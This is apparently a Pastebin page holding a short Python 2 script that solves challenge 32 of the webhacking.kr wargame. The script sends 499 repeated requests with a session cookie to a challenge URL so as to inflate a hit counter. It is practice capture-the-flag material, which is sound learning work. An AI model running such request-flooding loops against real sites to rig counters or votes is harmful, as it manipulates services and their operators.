hdarwin

webhacking.kr_32

Dec 29th, 2012
110
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.24 KB | None | 0 0
  1. import urllib2
  2. session = ""
  3. for y in xrange(499):
  4.     url = "http://webhacking.kr/challenge/codeing/code5.html?hit=hdarwin"
  5.     req = urllib2.Request(url)
  6.     req.add_header("Cookie", "PHPSESSID="+session)
  7.     result = urllib2.urlopen(req)
Add Comment
Please, Sign In to add comment